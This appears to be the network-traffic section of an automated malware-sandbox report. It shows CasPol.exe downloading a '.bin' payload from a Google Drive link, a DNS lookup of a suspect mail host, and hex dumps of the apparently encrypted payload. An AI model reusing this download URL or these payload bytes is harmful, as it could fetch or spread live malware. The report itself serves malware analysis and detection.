                                                                                May 27, 2022 13:26:33.012916088 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.012929916 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.012964964 CEST49763443192.168.11.20142.250.185.65
                                                                                May 27, 2022 13:26:33.012969017 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.013036966 CEST49763443192.168.11.20142.250.185.65
                                                                                May 27, 2022 13:26:33.013145924 CEST49763443192.168.11.20142.250.185.65
                                                                                May 27, 2022 13:26:33.013149977 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.013297081 CEST49763443192.168.11.20142.250.185.65
                                                                                May 27, 2022 13:26:33.013510942 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.013690948 CEST49763443192.168.11.20142.250.185.65
                                                                                May 27, 2022 13:26:33.013696909 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.013927937 CEST49763443192.168.11.20142.250.185.65
                                                                                May 27, 2022 13:26:33.013933897 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.013983965 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.014364004 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.014493942 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.014539957 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.014575958 CEST49763443192.168.11.20142.250.185.65
                                                                                May 27, 2022 13:26:33.014581919 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.014637947 CEST49763443192.168.11.20142.250.185.65
                                                                                May 27, 2022 13:26:33.014719009 CEST49763443192.168.11.20142.250.185.65
                                                                                May 27, 2022 13:26:33.015255928 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.015413046 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.015448093 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.015492916 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.015537024 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.015557051 CEST49763443192.168.11.20142.250.185.65
                                                                                May 27, 2022 13:26:33.015562057 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.015609980 CEST49763443192.168.11.20142.250.185.65
                                                                                May 27, 2022 13:26:33.015625954 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.015665054 CEST49763443192.168.11.20142.250.185.65
                                                                                May 27, 2022 13:26:33.015763044 CEST49763443192.168.11.20142.250.185.65
                                                                                May 27, 2022 13:26:33.015767097 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.016024113 CEST49763443192.168.11.20142.250.185.65
                                                                                May 27, 2022 13:26:33.016124964 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.016258955 CEST49763443192.168.11.20142.250.185.65
                                                                                May 27, 2022 13:26:33.016263962 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.016314983 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.016402960 CEST49763443192.168.11.20142.250.185.65
                                                                                May 27, 2022 13:26:33.016407967 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.016500950 CEST49763443192.168.11.20142.250.185.65
                                                                                May 27, 2022 13:26:33.016565084 CEST49763443192.168.11.20142.250.185.65
                                                                                May 27, 2022 13:26:33.016570091 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.016741037 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.016782045 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.016787052 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.016836882 CEST49763443192.168.11.20142.250.185.65
                                                                                May 27, 2022 13:26:33.016841888 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.016874075 CEST49763443192.168.11.20142.250.185.65
                                                                                May 27, 2022 13:26:33.016951084 CEST49763443192.168.11.20142.250.185.65
                                                                                May 27, 2022 13:26:33.017049074 CEST49763443192.168.11.20142.250.185.65
                                                                                May 27, 2022 13:26:33.017101049 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.017261982 CEST49763443192.168.11.20142.250.185.65
                                                                                May 27, 2022 13:26:33.017266035 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.017333984 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.017391920 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.017467976 CEST49763443192.168.11.20142.250.185.65
                                                                                May 27, 2022 13:26:33.017472982 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.017981052 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.018115997 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.018157005 CEST44349763142.250.185.65192.168.11.20
                                                                                May 27, 2022 13:26:33.018239021 CEST49763443192.168.11.20142.250.185.65
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 27, 2022 13:26:31.791882992 CEST | 58899 | 53 | 192.168.11.20 | 1.1.1.1
May 27, 2022 13:26:31.800254107 CEST | 53 | 58899 | 1.1.1.1 | 192.168.11.20
May 27, 2022 13:26:32.678366899 CEST | 58432 | 53 | 192.168.11.20 | 1.1.1.1
May 27, 2022 13:26:32.717102051 CEST | 53 | 58432 | 1.1.1.1 | 192.168.11.20
May 27, 2022 13:26:44.708852053 CEST | 50612 | 53 | 192.168.11.20 | 1.1.1.1
May 27, 2022 13:26:44.776501894 CEST | 53 | 50612 | 1.1.1.1 | 192.168.11.20
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
May 27, 2022 13:26:31.791882992 CEST | 192.168.11.20 | 1.1.1.1 | 0x33a9 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001)
May 27, 2022 13:26:32.678366899 CEST | 192.168.11.20 | 1.1.1.1 | 0xd7f4 | Standard query (0) | doc-0g-cc-docs.googleusercontent.com | A (IP address) | IN (0x0001)
May 27, 2022 13:26:44.708852053 CEST | 192.168.11.20 | 1.1.1.1 | 0xebf7 | Standard query (0) | mail.cortijocuevas.com | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
May 27, 2022 13:26:31.800254107 CEST | 1.1.1.1 | 192.168.11.20 | 0x33a9 | No error (0) | drive.google.com | | 172.217.16.142 | A (IP address) | IN (0x0001)
May 27, 2022 13:26:32.717102051 CEST | 1.1.1.1 | 192.168.11.20 | 0xd7f4 | No error (0) | doc-0g-cc-docs.googleusercontent.com | googlehosted.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001)
May 27, 2022 13:26:32.717102051 CEST | 1.1.1.1 | 192.168.11.20 | 0xd7f4 | No error (0) | googlehosted.l.googleusercontent.com | | 142.250.185.65 | A (IP address) | IN (0x0001)
May 27, 2022 13:26:44.776501894 CEST | 1.1.1.1 | 192.168.11.20 | 0xebf7 | No error (0) | mail.cortijocuevas.com | cortijocuevas.com | | CNAME (Canonical name) | IN (0x0001)
May 27, 2022 13:26:44.776501894 CEST | 1.1.1.1 | 192.168.11.20 | 0xebf7 | No error (0) | cortijocuevas.com | | 168.119.38.32 | A (IP address) | IN (0x0001)
                                                                                • drive.google.com
                                                                                • doc-0g-cc-docs.googleusercontent.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.11.20 | 49762 | 172.217.16.142 | 443 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Timestamp | kBytes transferred | Direction | Data
2022-05-27 11:26:32 UTC | 0 | OUT | GET /uc?export=download&id=1EX-TfU9P_N_SsQAtVtT8-t2zzMXng6WS HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Host: drive.google.com
                                                                                Cache-Control: no-cache
2022-05-27 11:26:32 UTC | 0 | IN | HTTP/1.1 303 See Other
                                                                                Content-Type: application/binary
                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                Pragma: no-cache
                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                Date: Fri, 27 May 2022 11:26:32 GMT
                                                                                Location: https://doc-0g-cc-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/c6f1jlkill7f0g8rg2nidoteuikk5gii/1653650775000/00619175272154792338/*/1EX-TfU9P_N_SsQAtVtT8-t2zzMXng6WS?e=download
                                                                                Strict-Transport-Security: max-age=31536000
                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                Content-Security-Policy: script-src 'nonce-1bzVz6PRAVRfXgvEO5-aSw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                Server: ESF
                                                                                Content-Length: 0
                                                                                X-XSS-Protection: 0
                                                                                X-Frame-Options: SAMEORIGIN
                                                                                X-Content-Type-Options: nosniff
                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.11.20 | 49763 | 142.250.185.65 | 443 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Timestamp | kBytes transferred | Direction | Data
2022-05-27 11:26:32 UTC | 1 | OUT | GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/c6f1jlkill7f0g8rg2nidoteuikk5gii/1653650775000/00619175272154792338/*/1EX-TfU9P_N_SsQAtVtT8-t2zzMXng6WS?e=download HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Cache-Control: no-cache
                                                                                Host: doc-0g-cc-docs.googleusercontent.com
                                                                                Connection: Keep-Alive
2022-05-27 11:26:32 UTC | 1 | IN | HTTP/1.1 200 OK
                                                                                X-GUploader-UploadID: ADPycdt7PGT7SI8tQMmd7hkN_muuqMLcIXRqGLeR7EAcUSUWp-dW9DEwleL6YWCInH_OVjhQv6nWnQNVDmzOPJiybU1kxNBzDC8D
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Allow-Credentials: false
                                                                                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, 
X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment
                                                                                Access-Control-Allow-Methods: GET,OPTIONS
                                                                                Content-Type: application/octet-stream
                                                                                Content-Disposition: attachment;filename="CHINA_yWyNfFZTW202.bin";filename*=UTF-8''CHINA_yWyNfFZTW202.bin
                                                                                Content-Length: 214592
                                                                                Date: Fri, 27 May 2022 11:26:32 GMT
                                                                                Expires: Fri, 27 May 2022 11:26:32 GMT
                                                                                Cache-Control: private, max-age=0
                                                                                X-Goog-Hash: crc32c=0UwU9w==
                                                                                Server: UploadServer
                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                Connection: close
                                                                                Data Ascii: 5*"J$CC/t5x5UAcYe\[FU\/Zya ?^nhR6-=IQy566^ds{di]T/oMq<N}_pJkbmpG'a#Z;$&{%j(1Vw*DmI`mc<dk&8{`w*"q7CMG9!-{KSB\u{}k
                                                                                2022-05-27 11:26:32 UTC20INData Raw: 09 18 39 94 e7 bb 09 9a 7c 0a 03 23 85 4a dd 29 27 cc 52 ef fb b7 1f e8 c9 4e 9d 48 3d 68 34 8a c8 b7 03 c8 d9 7a 7e b2 b4 29 7a 5f e5 db 79 b3 76 86 fd 55 2d 0d d8 13 3f 7e cc 5f 51 3d c3 4a 22 79 71 98 a7 80 74 4d 0a 7f 36 20 fe a7 6a 46 81 20 ec 34 f8 aa 6b a9 2f 9f ca 17 2c ee 50 82 59 f6 d0 cb bf 5c b2 de a1 d7 50 a3 c4 86 71 7b f4 65 4c f9 3c e7 f1 d9 e1 fd 41 06 7c 23 69 4f 69 c1 6c 5c 29 66 9f 84 1d bd dd 71 64 15 23 7a 50 40 ca f2 ce 04 27 c9 b4 5d ad 73 17 fd 14 62 cf b2 a3 21 52 3a 5c e3 ef 2d 2b 06 ad 1f ae 38 eb 07 8c d2 0d cb 61 10 08 d9 d7 57 2a 1e d1 bd a0 f6 d5 0f 96 39 01 e8 cd 4d 17 93 8a 34 4c b5 34 e6 cb af 7f 8a 8a 1b 4c 00 bd eb e5 b6 29 42 4b 40 d3 9b 51 49 f4 02 fb d5 74 de 31 2e 2e 94 80 aa 41 78 bd bc 19 7a d2 e5 6c fb 38 27 d2
                                                                                Data Ascii: 9|#J)'RNH=h4z~)z_yvU-?~_Q=J"yqtM6 jF 4k/,PY\Pq{eL<A|#iOil\)fqd#zP@']sb!R:\-+8aW*9M4L4L)BK@QIt1..Axzl8'
                                                                                2022-05-27 11:26:32 UTC21INData Raw: 39 a8 e1 0c e2 90 a3 f5 2f ee 7b 92 0b 2d c7 49 e1 ac 8f d1 58 92 17 89 99 82 f0 64 ad f3 25 dd b4 81 36 b5 c5 76 22 0b de ae c2 ef dc ba 44 0a 13 5f 17 2d 32 3f 7b b0 c5 60 42 34 00 93 fc b5 18 1b 6c fd 4d 77 fe 00 aa 46 63 ff ee 37 90 a5 8c a0 e5 97 79 56 fb 88 63 bb 0b 33 cf ea 9c 4a 50 31 de 4e 7f a1 28 86 2a 2e dc 7f cf 2e 18 ef 8d 99 38 2d 51 c4 78 76 26 8d 9e d9 78 8f 8b 16 87 c9 ea aa a0 c4 c1 2a 62 0e 87 82 71 fd ff 46 7c e3 73 a8 7c d9 12 91 df 05 24 15 f0 56 a1 60 70 88 fd ae af 7b 23 b9 7d 15 dd 6e fd 3c f7 49 b6 bd 26 f2 f8 03 1a 8c 08 4c be e6 ef 1d d5 9c 0d 4e 54 39 55 1a 2a a8 eb 3a 7c b7 45 7d 93 3f ef 43 e5 a2 eb b1 89 8e c5 7a 3f 84 d3 b5 31 b0 8a b0 38 27 63 4c 1b ed 8a fc f1 af 23 7e 60 c6 0e 5b 64 eb 65 c5 3f 51 db f7 0c 35 d0 8d 17
                                                                                Data Ascii: 9/{-IXd%6v"D_-2?{`B4lMwFc7yVc3JP1N(*..8-Qxv&x*bqF|s|$V`p{#}n<I&LNT9U*:|E}?Cz?18'cL#~`[de?Q5
                                                                                2022-05-27 11:26:32 UTC22INData Raw: f9 c9 60 7e 3c 18 72 f1 70 a3 c1 68 25 92 30 81 55 81 b0 72 8e 99 87 36 bf 4f e1 85 b1 e4 74 ea 5b 8e a5 56 ce b8 e7 69 dc 9f 5e 87 31 5a 79 0b 0a 3c 3f 4d 5c a2 a7 d9 7d 01 a5 fc 5b 34 3c 92 ec 4c 9e c0 b4 79 35 c7 97 ef 29 c2 db 6f 4b d8 22 7d b8 03 e0 78 5d 45 d3 95 10 c7 6f 40 28 5d 71 10 17 73 5b 16 a2 98 a5 5a f2 31 6d e8 62 ac c2 82 b7 93 11 48 e6 7e c1 cd 4a 20 d4 88 10 b1 7a 7b 0a 2d eb d0 1f 24 14 fc 11 ed dc 7f ff cb 29 4f 75 75 66 2d 00 41 c7 d4 aa 0a df b4 e0 4a 86 6d 4d 1b f9 d7 fe fc ab ed 33 80 69 f9 15 19 a1 e0 60 40 28 e8 29 7b 73 45 59 8b 3d c1 09 e7 36 b2 27 da 8c e5 3d 6e 86 fc 78 78 42 b6 50 1d 5f 03 85 ba c0 0e f9 dd 69 d2 24 44 48 6f bb bf 05 b2 5a 7f a1 62 38 cb e5 16 f4 70 6d 35 39 d8 6d 84 0c c7 4e 66 15 08 1e 82 b2 cd e5 30 d5
                                                                                Data Ascii: `~<rph%0Ur6Ot[Vi^1Zy<?M\}[4<Ly5)oK"}x]Eo@(]qs[Z1mbH~J z{-$)Ouuf-AJmM3i`@(){sEY=6'=nxxBP_i$DHoZb8pm59mNf0
                                                                                2022-05-27 11:26:32 UTC24INData Raw: 7b 71 2a 01 00 9f 62 50 d6 f4 3e 06 a0 f9 b5 60 20 f9 4e 99 4f 0a 6b 39 8a ca df e5 c9 f5 72 04 ec 9c d5 7f 75 81 7b 66 c4 3e 8e e6 af 2f 09 c2 0c b2 6c b8 47 50 36 dd 3b 6a 71 67 62 8c e6 74 72 19 7e 3e 35 ed 2a 4b 6b 83 01 86 2d 8f 54 9e 7c 4f 9d c8 6b 3e ec 50 f2 71 93 d0 fa b9 21 ea c8 ac eb 1d ed c6 e9 53 73 ed 91 4f ae 71 cc 95 c7 c4 9b 48 1e 84 04 6f 41 7f bf 58 6c 2d 62 59 32 0a 67 eb 7a 7d 09 35 7f 73 85 ca de ca 13 05 c8 47 5c 88 44 eb 87 71 60 d7 bb a0 00 6b c5 5d c5 f6 7b 22 07 ad 11 c2 15 cf 06 86 a6 02 ac 61 14 09 65 a6 9a 2a 16 c5 6f b7 c1 d0 37 41 2f ff e9 fe 46 0c 9e 82 22 5a b5 34 e6 c6 86 7e 89 38 1d 5b dc cb a5 ed 87 e7 4b 6a 4c d3 80 76 b4 f5 88 f9 cd 78 ec 39 32 c1 83 bf a7 7e f5 d2 ce 19 7a c5 fc 78 05 31 12 3f 9a b9 56 1c a4 28 2c
                                                                                Data Ascii: {q*bP>` NOk9ru{f>/lGP6;jqgbtr~>5*Kk-T|Ok>Pq!SsOqHoAXl-bY2gz}5sG\Dq`k]{"ae*o7A/F"Z4~8[KjLvx92~zx1?V(,
                                                                                2022-05-27 11:26:32 UTC25INData Raw: 0a d0 15 8d 78 f6 d2 1f 56 d3 ab 9c dd c9 9e 52 8b 9d fc f9 64 ad f7 5b 0b 4b 7e cd 43 c4 03 3f 01 5e a6 d6 11 db 76 9a 1f ed 5c 4a 23 44 1a 9c cf 93 9e 53 44 35 85 fe b4 36 1e 4f fd 47 a3 b7 29 99 46 6d a2 7b 06 91 a5 84 c5 92 b5 66 04 f7 a0 4d bf 23 2e e7 ea 9b 72 73 31 df 44 ff a8 9b 4f 2e ff f0 7c cf 2e 01 c0 fb aa 43 53 58 c4 39 72 0e 84 b4 dd 7e a7 ae 79 b2 c2 6a a9 a2 ec f3 f6 e3 07 e8 b5 72 e2 86 62 e8 c7 7a a8 7d d0 33 9e c2 08 bf 34 bc 6e a0 6a fa 8a fe b8 9a ae 47 b9 6a cf 45 7b 57 23 ed 21 90 b1 21 f1 5e ae 1b 5a 19 be 07 ec 31 0b 7d 6f 0c 4e 56 ee ce 0d 0f 80 c4 25 09 8e 50 2b 60 3e ef 41 c7 91 c7 b1 8f ac 38 7a 39 a4 53 bc 30 a0 8e 6d 1f 24 63 4c 55 be fc db f5 d1 2a 7f 7b f2 25 47 4a eb 63 ed 03 51 db ec 8e 3f f8 b4 12 af 59 28 18 e6 ef 9f
                                                                                Data Ascii: xVRd[K~C?^v\J#DSD56OG)Fm{fM#.rs1DO.|.CSX9r~yjrbz}34njGjE{W#!!^Z1}oNV%P+`>A8z9S0m$cLU*{%GJcQ?Y(
                                                                                2022-05-27 11:26:32 UTC26INData Raw: e6 f9 a6 e9 7a 25 81 32 e4 49 97 a6 fc 5f ad 87 37 19 74 b3 ef ad db 75 ee 53 a0 9e 11 cf b2 99 6e d8 80 57 14 0e 5a 68 04 38 c2 3e 72 65 d5 56 68 7c 0b ae d0 48 3f 2d 95 f4 5c 58 50 99 7a 2d d4 8d e8 27 c7 3b 90 66 cc 3d 6a b5 12 f6 41 4c 45 d1 f0 09 d9 66 59 0b 48 61 1b 00 a8 77 3f 88 98 a8 67 68 71 c5 16 9d 51 ad 80 bc 93 02 50 fc 62 3a b7 5b 3c d6 8a bc 3d 26 7b 00 3a f1 f7 1d 23 14 e7 3e fe 22 7e f8 a7 74 5d 72 7f 68 25 0d b4 c6 e9 96 15 24 b2 40 58 91 7e 44 74 fc dd e1 e6 7d f9 1e 82 48 d9 00 e3 7a 0e 9b 69 08 91 2b 4b 71 47 a8 9a 3d c1 4e f4 33 b1 34 ac 89 8e 3d 6a 02 93 29 61 bc b1 63 10 5a 08 9f a6 c7 18 ea dd 69 d2 29 57 e8 74 b6 bf 13 a0 b7 79 8d 7b 17 9c e8 e8 ff 56 7f 46 0d d1 76 7e 1e ed 46 6d 0e 95 71 da b4 d6 11 33 96 55 53 b2 31 9f a7 3e
                                                                                Data Ascii: z%2I_7tuSnWZh8>reVh|H?-\XPz-';f=jALEfYHaw?ghqQPb:[<=&{:#>"~t]rh%$@X~Dt}Hzi+KqG=N34=j)acZi)Wty{VFv~Fmq3US1>
                                                                                2022-05-27 11:26:32 UTC28INData Raw: 23 28 0b c8 3b 3c fa 9b 19 70 f4 4e 94 57 dc 78 14 87 c8 d5 cf c9 f5 7a 04 eb 9c d5 7f 43 ee 79 6d a5 88 8f ca a1 2f 09 30 0d b2 6c e0 16 4b 3b df 4f 3c 8f 66 4a ac a4 74 27 4b 7f 3e 3b f0 50 66 6a 8a 17 17 0d a2 50 bf bb 18 92 ca 0d 04 13 51 d4 52 f4 c8 e3 cc 60 a2 c8 a6 e4 2e ae c4 8f 68 8c ec b7 46 d2 3b da bd 48 ec fd 4e 12 98 2f 45 48 62 41 4a 70 20 6a 12 4e 45 67 d1 7e 63 15 23 7a 5d 40 ca f2 c8 04 00 d5 b0 42 ad 9a e8 d0 3a 4b d2 87 c9 d7 b7 3b 55 e5 f5 40 36 04 ad b7 c1 3d ea 4c 86 ac 3b dd 6d 2c 91 43 b8 96 2a 16 c7 6f b7 c1 d1 08 9c 52 b0 e9 e1 4b 1d 92 8a 35 48 b5 34 e6 c1 f7 f8 a1 1d 1a 50 cf ba ec e5 99 1d 55 4d 4a d4 90 1c 18 f4 a4 ff ca 7d e0 31 26 22 7c 92 82 70 f0 bf c1 57 7a c3 e5 6a 09 39 03 da 65 94 7d 20 10 c6 30 dd 08 9c ee 33 4b 08
                                                                                Data Ascii: #(;<pNWxzCym/0lK;O<fJt'K>;PfjPQR`.hF;HN/EHbAJp jNEg~c#z]@B:K;U@6=L;m,C*oRK5H4PUMJ}1&"|pWzj9e} 03K
                                                                                2022-05-27 11:26:32 UTC29INData Raw: 3f 60 ee ba 8d d9 a3 d7 17 89 99 f4 96 0d ac f7 51 af 2f 81 32 9b f9 7d 31 04 5e b6 c7 f0 d5 99 9e 25 1f 57 04 36 7c 7d 9d 31 33 7f 4c 23 2d 85 ef b0 04 cd 4e d1 48 6b 75 12 b9 43 67 33 56 2b 9c 5b 8f 93 9c ac 77 fe fe 97 6e ac 26 24 dc ef 85 6c 8d 30 f2 48 fd d3 78 86 2e f7 6f 71 d0 21 09 f5 ff bb 24 4c 49 3a 79 5e 1e 97 9b b7 fb a1 c6 93 e8 5e 6a a3 a6 db d7 e4 e6 0d 96 87 6c f6 72 74 49 92 78 d3 32 dd 3a 8c b2 7f 22 3d d9 49 b4 79 f5 81 ec ab b2 58 41 96 6d 17 a4 3f 89 0f ea 58 e0 bc 26 fc 68 13 02 9f 0b 64 8c e3 f0 05 ab 94 21 41 52 9f 5e 19 2a ac d0 ce 09 84 5c 1c 89 2c ea 47 dc bc f2 4f 8e 8a ed 78 44 de 53 bc 35 9c a0 71 0c 21 63 5d 1c ed f3 31 e9 fd 30 7c 67 c0 5d 17 66 eb 67 63 ab e9 0c 93 09 3a be 08 7c 32 53 2d 09 2f 65 87 e2 b1 ba 80 6d f8 02
                                                                                Data Ascii: ?`Q/2}1^%W6|}13L#-NHkuCg3V+[wn&$l0Hx.oq!$LI:y^^jlrtIx2:"=IyXAm?X&hd!AR^*\,GOxDS5q!c]10|g]fgc:|2S-/em
                                                                                2022-05-27 11:26:32 UTC30INData Raw: 48 f4 41 8b 96 72 75 e3 87 36 bf 74 bf ed 9f 8b 49 ef 59 ac 90 46 ca a4 bb 16 dd 9f 56 69 25 0a 32 0c 24 56 11 5c 7a 8c a4 13 25 01 a5 cd 4d 07 24 86 84 05 a6 51 b1 74 1e dc 85 93 6f cc 25 6a 79 d3 23 79 c6 4a 6c 69 59 53 c6 89 77 c7 6f 40 0d 63 72 06 37 76 89 ec 84 89 2c 5e f8 48 7d e2 60 d5 fd 93 b7 97 10 20 bd 6c c4 b2 61 4f a6 8d 94 d4 00 78 71 70 f4 df 08 28 3f cb 1f fc 34 79 d5 46 86 36 5a 01 76 2a 14 08 a9 c5 9c 03 d0 a0 69 5f 80 7b 5e 71 82 a2 fe f6 89 ff 23 85 db b2 e2 17 80 e7 0e 5b f7 95 57 01 73 47 22 99 46 98 0b f4 37 be 11 a7 b8 8a a3 6a 02 99 37 52 42 ab 7f 17 4c 2b 85 ab c7 47 f0 23 79 8d 9b 7c b5 65 b7 bd 19 b0 26 ed a1 73 39 f8 e5 ec fd 33 2e 4b 0d d2 3c 97 14 1f 40 6f 12 5e 08 98 6b dc 13 1d ff 17 3d ef 3b b7 e6 e3 c8 c4 aa f4 3f ea 53
                                                                                Data Ascii: HAru6tIYFVi%2$V\z%M$Qto%jy#yJliYSwo@cr7v,^H}` laOxqp(?4yF6Zv*i_{^q#[WsG"F7j7RBL+G#y|e&s93.K<@o^k=;?S
